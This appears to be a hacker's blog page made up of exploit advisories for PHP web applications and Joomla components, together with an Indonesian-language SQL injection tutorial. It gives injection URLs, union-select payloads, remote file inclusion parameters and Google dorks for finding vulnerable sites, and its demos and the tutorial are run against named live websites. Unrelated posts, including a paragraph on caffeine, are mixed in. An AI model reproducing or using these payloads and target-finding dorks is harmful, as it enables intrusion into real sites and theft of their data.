NoGe.ZoNe

[o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln
Software : minimal-ablog version 0.4
Vendor   : http://www.abweb.co.cc/
Download : http://code.google.com/p/minimal-ablog/downloads/list
Author   : NoGe

[o] Vulnerable file
index.php
admin/uploader.php

[o] Exploit
[ SQL Injection ]
http://localhost/[path]/index.php?id=[SQL]
http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--  <=- demo [ File Upload ] http://localhost/[path]/admin/uploader.php  <=- upload your file here http://localhost/[path]/img/[your_file]  <=- file will be uploaded here [ Admin Bypass ] when you open http://localhost/[path]/admin/uploader.php to upload file you already have admin privs too :)  

[o] photoDiary 1.2 SQL Injection Vulnerability
Software : photoDiary version 1.2
Vendor   : http://webgriffe.com/
Download : http://code.google.com/p/photodiary/downloads/list
Author   : NoGe

[o] Vulnerable file
admin/index.php
$act = $_GET['act'];
.....
if($act=="edit" || $act=="new"){
$id = $_GET['id'];

[o] Exploit
http://localhost/[path]/admin/index.php?act=edit&id=[SQL]

[o] Demo
http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--

[o] Note
its funny coz usually you do sql to get admin login but this one you must have admin privs to execute sql. lolz

[o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability
Software : PageTree CMS version 0.0.2 BETA 0001
Vendor   : http://pagetreecms.co.cc/
Download : http://pagetree.googlecode.com/svn/trunk/
Author   : NoGe

[o] Vulnerable file
admin/plugins/Online_Users/main.php
include($GLOBALS['PT_Config']['dir']['data']."content/1.php");

[o] Exploit
http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode]

[o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
Software : Pie Web M{a,e}sher version 0.5.3
Vendor   : http://pie.ekkaia.org/
Download : http://pie.ekkaia.org/page/Download
Author   : NoGe

[o] Vulnerable file
all file below is affected by "lib" parameter
lib/action/alias.php
lib/action/cancel.php
lib/action/context.php
lib/action/deadlinks.php
lib/action/delete.php
lib/action/diff.php
lib/action/download.php
lib/action/dump.php
lib/action/edit.php
lib/action/fileimport.php
lib/action/fileinfo.php
lib/action/filelist.php
lib/action/goto.php
lib/action/history.php
lib/action/image.php
lib/action/latest.php
lib/action/links.php
lib/action/logflush.php
lib/action/login.php
lib/action/logout.php
lib/action/logshow.php
lib/action/maintenance.php
lib/action/page.php
lib/action/pageimport.php
lib/action/pageinfo.php
lib/action/pagelist.php
lib/action/password.php
lib/action/preview.php
lib/action/purge.php
lib/action/referers.php
lib/action/register.php
lib/action/rename.php
lib/action/revert.php
lib/action/rss.php
lib/action/search.php
lib/action/show.php
lib/action/source.php
lib/action/systeminfo.php
lib/action/update.php
lib/action/upgrade.php
lib/action/upload.php
lib/action/useradd.php
lib/action/userdel.php
lib/action/useredit.php
lib/action/userimport.php
lib/action/userinfo.php
lib/action/userlist.php
lib/action/version.php
lib/action/wipe.php

all file below is affected by "GLOBALS[pie][library_path]" parameter
lib/class/diff.php
lib/class/file.php
lib/class/locale.php
lib/class/mapfile.php
lib/class/page.php
lib/class/user.php
lib/class/userpref.php
lib/compiler/html.php
lib/share/auth.php
lib/share/errorimage.php
lib/share/link.php
lib/share/log.php
lib/share/private.php
lib/share/referers.php

[o] Exploit
http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/compiler/html.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]

[o] ZoGo-Shop e107 plugins 1.15.4 SQL Injection Vulnerability
Software : ZoGo-Shop plugins version 1.15.4
Vendor   : http://e107.org/
Download : http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.89
Author   : NoGe

[o] Vulnerable file
e107_plugins/zogo-shop/product_details.php
$product_ID=$_GET["product"];

[o] Exploit
http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL]

[o] Dork
"Powered by ZoGo-Shop" or "e107_plugins/zogo-shop/product_details.php"

a little boy lost contact with his mother in a shopping mall.
so he went up to a policeman and said.
"please could you help me find a lady who's here without a little boy who looks like me??"

:p

[x] Apa itu SQL injection?

SQL injection adalah teknik eksploitasi database via remote.
dengan menggunakan SQL Query [perintah2 SQL] kita bisa mengetahui isi dari database target.
lebih lanjut bisa dibaca disini http://en.wikipedia.org/wiki/SQL_injection
cape ngejelasin ne.. panjang amit. :)


[x] Bagaimana cara mendeteksi SQL Injection pada sebuah site?

ada banyak cara untuk mendeteksi SQL Injection pada sebuah site.
salah satunya adalah dengan menggunakan command AND 1=1 dan AND 1=2
AND 1=1 <=- keadaan TRUE
AND 1=2 <=- keadaan FALSE
masih banyak cara2 yang lain untuk mendeteksi SQL Injection, dalam tutor ini gw hanya menggunakan cara ini.
langsung contoh target ajah ya...
googling dengan keyword "product_details.php?product_id="
nah pasti bakal keluar target2nya kan? kita ambil contoh target berikut.

http://www.ntlabs.co.uk/product_details.php?product_id=17

sekarang kita akan mencoba mendeteksi SQL Injection pada target diatas dengan menggunakan command2 tadi.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=1
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=2

apa perbedaan antara URL pertama dan URL kedua?
dalam kondisi AND 1=1 [TRUE] halaman sitenya tidak akan mengalami perubahan sedangkan
dalam kondisi AND 1=2 [FALSE] halaman sitenya pasti akan berubah, baik itu ada pesan error ataupun tidak.
ini berarti site tersebut bisa kita eksploitasi dengan menggunakan SQL Injection.


[x] Bagaimana mencari jumlah TABLE dalam database?

ada banyak cara juga dalam mencari jumlah TABLE dalam database target, dalam tutor ini gw make command ORDER BY.
angka dibelakang comamand ORDER BY adalah jumlah TABLE, kita mulai dengan angka 1.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 1/*

setelah dirun ternyata halamannya tidak ada perubahan atau halamannya masih dalam kondisi TRUE, itu berarti TABLE lebih dari 1.
langsung ke angka 10 ajah biar cepet. :)

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 10/*

apa yang terjadi? ternyata halamannya berubah atau halaman sudah dalam kondisi FALSE, berarti TABLE tidak lebih dari 10.
jadi range TABLE dalam databasenya adalah dari 1 - 10.
sekarang kita turunin angkanya jadi 9.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 9/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 8/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 7/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 6/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 5/*

ternyata masih FALSE juga, so kita turunin lagi angkanya sampai dapat kondisi TRUE

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 4/*

ternyata pada angka 4 halaman kembali pada kondisi TRUE. jadi bisa kita simpulkan bahwa ada 4 TABLE didalam database target.
koq bisa tau ada 4 TABLE sih? karena pada angka 4 kondisi halaman TRUE sedangkan pada angka 5 kondisi halaman sudah FALSE.
ga percaya? kita buktikan dengan menggunakan command UNION SELECT.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4,5/*

lagi2 kondisi TRUE pada URL pertama dan kondisi FALSE pada URL kedua.
benarkan? :p


[x] Magic number? [what the f*ck]

apa itu magic number?
magic number adalah angka2 yang akan keluar pada halaman site, angka2 ini akan dipakai untuk memasukkan SQL Query [perintah2 SQL]
bagaimana cara mengeluarkan magic numbernya?
caranya yaitu dengan menambahkan tanda - didepan angka setelah variabel. dalam tutor ini yaitu angka 17. [product_details.php?product_id=-17]

http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,3,4/*

angka2 berapa ajah yang keluar pada halaman site?
yup ada angka 2, 3 dan 4. jadi angka2 ini yang akan kita pakai untuk memasukkan SQL Query [perintah2 SQL].
misalnya untuk melihat versi dari database kita dapat menggunakan perintah version().

[1] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,version(),4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,database(),version(),user()/*

jadi magic number yang udah dikeluarin tadi diganti dengan perintah2 SQL. ngerti ora? xixixi...
kurang lebih seperti itu cara untuk mendeteksi SQL Injection Vulnerability pada sebuah site atau source.
any question? post comment atau googling ajah yak!! :)


[x] Referensi

google.com
wikipedia.org
milw0rm.com
ReadMe Files
special greetz to k1tk4t

[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software  : BBShop version 4.5
Vendor    : http://zzem.co.kr/
Developer : The Win
Author    : NoGe

[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all this file is affected by _shop_path variable

[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]

[o] Dork
"bbshop"

[o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability
Software : com_rssreader version 1.0
Vendor   : http://www.joomlashop.dk/
Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47
Author   : NoGe

[o] Vulnerable file
administrator/components/com_rssreader/admin.rssreader.php
include( "$mosConfig_live_site/components/com_rssreader/about.html" );

[o] Exploit
http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]

[o] WEB-CMS - V-WIN.COM CMS SQL Injection Vulnerability
Software : WEB-CMS - V-WIN.COM CMS [MALAYSIA WEBSITE CONTENT MANAGEMENT SYSTEM]
Vendor   : http://www.v-win.com/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com

[o] Exploit
http://localhost/[path]/?page=pri&pid=[SQL Query]

[o] Live Demo
http://www.v-win.com/cms/?page=pri&pid=-131+union+select+1,2,3,database(),version(),6--

[o] Dork
"Concept, Designed, and Maintained by www.v-win.com"

[o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities
Software : com_feederator version 1.0.5
Vendor   : http://www.recly.com
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2
Author   : NoGe

[o] Vulnerable file
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
administrator/components/com_feederator/includes/tmsp/edit_tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
administrator/components/com_feederator/includes/tmsp/subscription.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php');
administrator/components/com_feederator/includes/tmsp/tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_HTML/Recly_Paginator.class.php' );

[o] Exploit
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode]

[o] Clickheat - Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities
Software : com_clickheat version 1.0.1
Vendor   : http://www.recly.com
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
Author   : NoGe

[o] Vulnerable file
administrator/components/com_clickheat/install.clickheat.php
require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
administrator/components/com_clickheat/includes/heatmap/_main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
administrator/components/com_clickheat/includes/heatmap/main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
administrator/components/com_clickheat/includes/overview/main.php
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
administrator/components/com_clickheat/Recly/Clickheat/Cache.php
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
administrator/components/com_clickheat/Recly/common/GlobalVariables.php
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');

[o] Exploit
http://localhost/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]

[o] Recly!Competitions Joomla Component 1.0.0 Multiple Remote File Inclusion Vulnerabilities
Software : com_competitions version 1.0.0
Vendor   : http://www.recly.com
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12
Author   : NoGe

[o] Vulnerable file
administrator/components/com_competitions/includes/competitions/add.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php');
administrator/components/com_competitions/includes/competitions/competitions.php
require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php' );
administrator/components/com_competitions/includes/settings/settings.php
require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php');

[o] Exploit
http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode]

[o] Dada Mail Manager Joomla Component 2.6 Remote File Inclusion Vulnerability
Software : com_dadamail version 2.6
Vendor   : http://joomlander.net
Download : http://joomlacode.org/gf/project/dadamailmanager/frs
Author   : NoGe

[o] Vulnerable file
administrator/components/com_dadamail/config.dadamail.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');

[o] Exploit
http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=[evilcode]

[o] Virtuemart Google Base Component 1.1 Remote File Inclusion Vulnerability
Software : com_googlebase version 1.1
Vendor   : http://www.joomlahacks.com/
Author   : NoGe

[o] Vulnerable file
administrator/components/com_googlebase/admin.googlebase.php
include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );

[o] Exploit
http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]

[o] Onguma TimeSheet 4 Beta Remote File Inclusion Vulnerability
Software : com_ongumatimesheet20 version 4 Beta
Download : http://joomlacode.org/gf/project/ongumasa/frs/
Author   : NoGe

[o] Vulnerable file
administrator/components/com_ongumatimesheet20/lib/onguma.class.php
include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php');
include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php');
include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php');

[o] Exploit
http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode]

Kafein adalah zat kimia yang tergolong dalam jenis alkaloid. Kafein berasal dari tanaman yang dapat menstimulasi otak dan saraf. Lantas, bagaimanakah pengaruh kafein jika dikonsumsi?
Selain pada kopi, kafein banyak ditemukan dalam minuman teh, cola, coklat, minuman berenergi (energy drink) maupun obat-obatan. Kandungan kafein pada secangkir kopi sekitar 80-125 mg. Sedangkan satu kaleng soft drink cola mengandung sekitar 23-37 mg, teh mengandung sekitar 40 mg, dan satu ons coklat mengandung sekitar 20 mg kafein. Sejauh ini, belum ada penelitian ilmiah yang menyatakan konsumsi kafein dalam taraf normal dapat membahayakan kesehatan. Namun, konsumsi kafein secara berlebihan dapat menimbulkan berbagai masalah, seperti warna gigi yang berubah menjadi coklat atau gelap, bau mulut, meningkatkan stress, serangan jantung, kemandulan pada pria, gangguan pencernaan, kecanduan, dan bahkan penuaan dini. Kafein juga merupakan salah satu penyebab utama terjadinya sakit kepala. Beberapa penelitian menyebutkan bahwa konsumsi kopi dalam jumlah berlebih dipagi hari dapat meningkatkan tekanan darah, tingkat stress, dan memicu produksi hormon penyebab stres.


Untung /me ga ngerokok. :)

[o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability
Software : com_treeg version 1.0
Vendor : http://justjoomla.net/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com

[o] Vulnerable file
administrator/components/com_treeg/admin.treeg.php
include( "$mosConfig_live_site/components/com_treeg/about.html" );

[o] Exploit
http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]